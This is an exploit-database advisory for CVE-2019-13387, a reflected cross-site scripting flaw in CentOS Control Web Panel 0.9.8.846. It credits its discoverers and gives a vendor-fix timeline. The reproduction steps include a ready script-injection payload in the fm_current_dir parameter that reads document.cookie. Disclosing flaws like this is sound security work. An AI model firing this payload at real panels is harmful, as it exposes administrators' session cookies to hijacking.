CentOS Control Web Panel 0.9.8.846 Cross Site Scripting Vulnerability

2019-08-0600:00:00

Pongtorn Angsuchotmetee

0day.today

0.005 Low

EPSS

Percentile

76.9%

JSON

Exploit for linux platform in category web applications

# Exploit Title: CWP (CentOS Control Web Panel) Reflected Cross Site Scripting
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/
# Version: 0.9.8.846
# Tested on: CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
# CVE : CVE-2019-13387

+++++++++++++++++++++++++++++++++
#  Description:
+++++++++++++++++++++++++++++++++

CWP Version 0.9.8.846 have implemented token in every URL to prevent cross site scripting.
But the aplication checks only length of the token, this allows attacker to follow the token format to bypass XSS protection

Refer CVE:2018-18324

+++++++++++++++++++++++++++++++++
#  Steps to Reproduce
+++++++++++++++++++++++++++++++++
Example : https://[target.com]:2083/cwp_xxxxxxxxxxxxxxxx/user1/fileManager2.php?frame=3&fm_current_dir=</script><script>alert(document.cookie)</script>

Parameter Name: fm_current_dir

Attack Pattern for XSS: </script><script>alert(document.cookie)</script> 

+++++++++++++++++++++++++++++++++
# PoC
+++++++++++++++++++++++++++++++++

https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13387.md


+++++++++++++++++++++++++++++++++
#  Timeline
+++++++++++++++++++++++++++++++++
2019-07-07: Discovered the bug
2019-07-07: Reported to vendor
2019-07-07: Vender accepted the vulnerability
2019-07-15: The vulnerability has been fixed
2019-07-23: Published

+++++++++++++++++++++++++++++++++
# Discovered by
+++++++++++++++++++++++++++++++++
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak

#  0day.today [2019-12-04]  #

0.005 Low

EPSS

Percentile

76.9%

JSON

Related for 1337DAY-ID-33080